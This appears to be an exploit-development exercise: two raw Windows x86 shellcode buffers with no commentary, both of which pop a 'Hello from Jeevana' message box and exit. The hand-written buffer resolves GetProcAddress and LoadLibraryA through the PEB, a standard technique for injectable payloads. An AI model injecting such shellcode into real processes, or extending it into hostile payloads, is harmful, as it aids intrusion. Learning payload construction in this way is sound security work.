shellcode =  b""
shellcode += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2"
shellcode += b"\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b"
shellcode += b"\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac"
shellcode += b"\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
shellcode += b"\x49\x75\xef\x52\x8b\x52\x10\x8b\x42\x3c\x57"
shellcode += b"\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0"
shellcode += b"\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\x85\xc9"
shellcode += b"\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += b"\xc0\xc1\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4"
shellcode += b"\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58"
shellcode += b"\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01"
shellcode += b"\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b"
shellcode += b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
shellcode += b"\x12\xe9\x80\xff\xff\xff\x5d\xe8\x0b\x00\x00"
shellcode += b"\x00\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c"
shellcode += b"\x00\x68\x4c\x77\x26\x07\xff\xd5\x6a\x00\xe8"
shellcode += b"\x08\x00\x00\x00\x4d\x65\x73\x73\x61\x67\x65"
shellcode += b"\x00\xe8\x13\x00\x00\x00\x48\x65\x6c\x6c\x6f"
shellcode += b"\x20\x66\x72\x6f\x6d\x20\x4a\x65\x65\x76\x61"
shellcode += b"\x6e\x61\x00\x6a\x00\x68\x45\x83\x56\x07\xff"
shellcode += b"\xd5\x6a\x00\x68\xf0\xb5\xa2\x56\xff\xd5"

buf = "\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"
buf += "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"
buf += "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"
buf +=  "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"
buf += "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"
buf += "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"
buf += "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"
buf += "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"
buf += "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"
buf += "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"
buf +=  "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"
buf += "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"
buf += "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"
buf += "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"
buf += "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"
buf += "\x6E\x61\x21\x68\x65\x65\x76\x61\x68\x6F"
buf += "\x6D\x20\x4A\x68\x6F\x20\x66\x72\x68\x48"
buf += "\x65\x6C\x6C\x8b\xcc\x57\x57\x51\x57\xff"
buf += "\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c\x24"
buf += "\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69"
buf +=  "\x74\x54\x53\xff\xd6\x57\xff\xd0"
